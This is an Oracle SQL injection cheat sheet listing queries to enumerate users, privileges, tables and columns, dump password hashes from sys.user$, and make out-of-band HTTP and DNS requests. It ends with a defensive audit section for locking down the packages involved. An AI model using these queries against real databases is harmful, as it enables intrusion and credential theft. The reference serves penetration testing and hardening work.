ORACLE Sqli Cheat Sheet


Version
    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

Comments
    SELECT 1 FROM dual -- comment
    -- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User
    SELECT user FROM dual;

List Users
    SELECT username FROM all_users ORDER BY username;
    SELECT name FROM sys.user$; -- priv

List Password Hashes
    SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you if acct is locked
    SELECT name, spare4 FROM sys.user$; -- priv, 11g

Password Cracker
    checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges
    SELECT * FROM session_privs; -- current privs
    SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
    SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv

List DBA Accounts
    SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

Current Database
    SELECT global_name FROM global_name;
    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance;


List Databases
    SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
    -- Also query the TNS listener for other databases. See tnscmd (services | status).

List Columns
    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
    SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables
    SELECT table_name FROM all_tables;
    SELECT owner, table_name FROM all_tables;

Find Tables From Column Name
    SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row
    SELECT username FROM (SELECT ROWNUM r, username FROM (SELECT username FROM all_users ORDER BY username)) WHERE r = 9; -- gets 9th row (rows numbered from 1)
    -- NB: the ORDER BY must sit in its own inner subquery; ROWNUM is assigned before the sort within a single query block, so "SELECT ROWNUM r, username FROM all_users ORDER BY username" numbers rows in retrieval order, not alphabetical order.

Select Nth Char
    SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND
    SELECT bitand(6,2) FROM dual; -- returns 2
    SELECT bitand(6,1) FROM dual; -- returns 0

ASCII Value -> Char
    SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value
    SELECT ascii('A') FROM dual; -- returns 65

Casting
    SELECT CAST(1 AS char) FROM dual;
    SELECT CAST('1' AS int) FROM dual;

String Concatenation
    SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement
    BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement
    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
    SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes
    SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay
    BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
    SELECT UTL_INADDR.get_host_name('') FROM dual; -- if reverse lookups are slow
    SELECT UTL_INADDR.get_host_address('') FROM dual; -- if forward lookups are slow
    SELECT UTL_HTTP.REQUEST('<url>') FROM dual; -- if outbound TCP is filtered / slow ('<url>' is a placeholder for the URL to fetch)
    -- Also see Heavy Queries to create a time delay

Make DNS Requests
    SELECT UTL_INADDR.get_host_address('') FROM dual;
    SELECT UTL_HTTP.REQUEST('<url>') FROM dual; -- '<url>' is a placeholder for the URL to fetch

Command Execution
    Java can be used to execute commands if it's installed.
    ExtProc can sometimes be used too, though it normally failed for me. 🙁

Local File Access
    UTL_FILE can sometimes be used. Check that the following is non-null:
    SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
    Java can be used to read and write files if it's installed (it is not available in Oracle Express).
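The time-delay, DNS-request and local-file entries above only work when the calling account can execute the SYS packages involved (UTL_HTTP, UTL_INADDR, UTL_FILE, DBMS_LOCK) or when utl_file_dir is set. The following audit queries are an added example, not part of the original cheat sheet: run as a DBA, they use dba_tab_privs, dba_sys_privs and v$parameter2 to show which of those packages are executable by PUBLIC, who holds SELECT ANY DICTIONARY (the privilege that exposes sys.user$ and the other "priv" queries on this sheet), and whether UTL_FILE has a directory to work with. It assumes the auditing account can read the DBA_* views.

```sql
-- 1. SYS packages from this sheet that every account can call through a PUBLIC grant.
--    Any row here means an injection point can reach DNS/HTTP/file/sleep primitives
--    without the application account holding an explicit grant.
SELECT table_name AS package_name, grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND table_name IN ('UTL_HTTP', 'UTL_INADDR', 'UTL_FILE', 'DBMS_LOCK')
 ORDER BY table_name;

-- 2. Accounts (users or roles) that can read the data dictionary, including sys.user$.
--    Application accounts should not appear in this list.
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'SELECT ANY DICTIONARY'
 ORDER BY grantee;

-- 3. Whether UTL_FILE is pointed at a directory at all (NULL = the entry above does not apply).
SELECT name, value
  FROM v$parameter2
 WHERE name = 'utl_file_dir';

-- Remediation for an unwanted row from query 1: revoke the PUBLIC grant and grant
-- EXECUTE only to the specific accounts that need it (one statement per package).
-- REVOKE EXECUTE ON UTL_HTTP FROM PUBLIC;
```

On 11g and later, UTL_HTTP and UTL_INADDR are additionally gated by network ACLs, so a PUBLIC EXECUTE grant on its own does not guarantee that outbound lookups or requests succeed; query 1 still tells you which accounts can attempt them, which is what matters when triaging a suspected injection.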
Hostname, IP Address
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT host_name FROM v$instance;
    SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
    SELECT UTL_INADDR.get_host_name('') FROM dual; -- gets hostnames

Location of DB files
    SELECT name FROM V$DATAFILE;

Default/System Databases
    SYSTEM
    SYSAUX
